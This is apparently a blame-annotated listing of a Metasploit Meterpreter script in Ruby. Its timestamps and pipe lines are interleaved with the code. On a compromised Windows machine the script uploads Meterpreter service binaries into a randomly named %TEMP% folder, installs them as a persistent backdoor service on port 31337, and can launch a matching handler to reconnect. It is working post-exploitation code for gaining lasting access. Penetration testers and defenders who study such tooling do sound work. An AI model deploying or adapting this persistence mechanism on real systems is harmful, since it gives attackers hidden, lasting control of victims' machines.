2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2011-10-23 11:56:13 +00:00
|
|
|
# $Revision$
|
2009-10-20 19:36:19 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Meterpreter script for installing the meterpreter service
|
|
|
|
#
|
|
|
|
|
|
|
|
session = client
|
|
|
|
|
|
|
|
#
|
|
|
|
# Options
|
|
|
|
#
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false, "This help menu"],
|
|
|
|
"-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],
|
2009-10-20 22:42:44 +00:00
|
|
|
"-A" => [ false, "Automatically start a matching multi/handler to connect to the service"]
|
2009-10-20 19:36:19 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
# Exec a command and return the results
|
|
|
|
def m_exec(session, cmd)
|
|
|
|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
b = ""
|
|
|
|
while(d = r.channel.read)
|
|
|
|
b << d
|
|
|
|
end
|
2010-03-07 22:49:08 +00:00
|
|
|
r.channel.close
|
2009-10-20 19:36:19 +00:00
|
|
|
r.close
|
|
|
|
b
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Default parameters
|
|
|
|
#
|
|
|
|
|
|
|
|
based = File.join(Msf::Config.install_root, "data", "meterpreter")
|
|
|
|
rport = 31337
|
|
|
|
install = false
|
|
|
|
autoconn = false
|
|
|
|
remove = false
|
2010-09-09 16:09:27 +00:00
|
|
|
if client.platform =~ /win32|win64/
|
|
|
|
|
|
|
|
#
|
|
|
|
# Option parsing
|
|
|
|
#
|
|
|
|
opts.parse(args) do |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
print_line(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
when "-A"
|
|
|
|
autoconn = true
|
|
|
|
when "-r"
|
|
|
|
remove = true
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
end
|
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#
|
|
|
|
# Create the persistent VBS
|
|
|
|
#
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
if(not remove)
|
|
|
|
print_status("Creating a meterpreter service on port #{rport}")
|
|
|
|
else
|
|
|
|
print_status("Removing the existing Meterpreter service")
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#
|
|
|
|
# Upload to the filesystem
|
|
|
|
#
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
print_status("Creating a temporary installation directory #{tempdir}...")
|
|
|
|
client.fs.dir.mkdir(tempdir)
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
%W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
|
|
|
|
next if (bin != "metsvc.exe" and remove)
|
|
|
|
print_status(" >> Uploading #{bin}...")
|
|
|
|
fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
|
|
|
|
fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
|
|
|
|
fd.close
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#
|
|
|
|
# Execute the agent
|
|
|
|
#
|
|
|
|
if(not remove)
|
|
|
|
print_status("Starting the service...")
|
|
|
|
client.fs.dir.chdir(tempdir)
|
|
|
|
data = m_exec(client, "metsvc.exe install-service")
|
|
|
|
print_line("\t#{data}")
|
|
|
|
else
|
|
|
|
print_status("Stopping the service...")
|
|
|
|
client.fs.dir.chdir(tempdir)
|
|
|
|
data = m_exec(client, "metsvc.exe remove-service")
|
|
|
|
print_line("\t#{data}")
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
if(remove)
|
|
|
|
m_exec(client, "cmd.exe /c del metsvc.exe")
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
#
|
|
|
|
# Setup the multi/handler if requested
|
|
|
|
#
|
|
|
|
if(autoconn)
|
2012-02-29 01:28:47 +00:00
|
|
|
print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
|
2010-09-09 16:09:27 +00:00
|
|
|
mul = client.framework.exploits.create("multi/handler")
|
|
|
|
mul.datastore['WORKSPACE'] = client.workspace
|
|
|
|
mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
|
|
|
|
mul.datastore['LPORT'] = rport
|
2012-02-29 01:28:47 +00:00
|
|
|
mul.datastore['RHOST'] = client.session_host
|
2010-09-09 16:09:27 +00:00
|
|
|
mul.datastore['ExitOnSession'] = false
|
|
|
|
mul.exploit_simple(
|
|
|
|
'Payload' => mul.datastore['PAYLOAD'],
|
|
|
|
'RunAsJob' => true
|
|
|
|
)
|
|
|
|
end
|
2009-10-20 19:36:19 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
else
|
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
2012-02-29 01:28:47 +00:00
|
|
|
end
|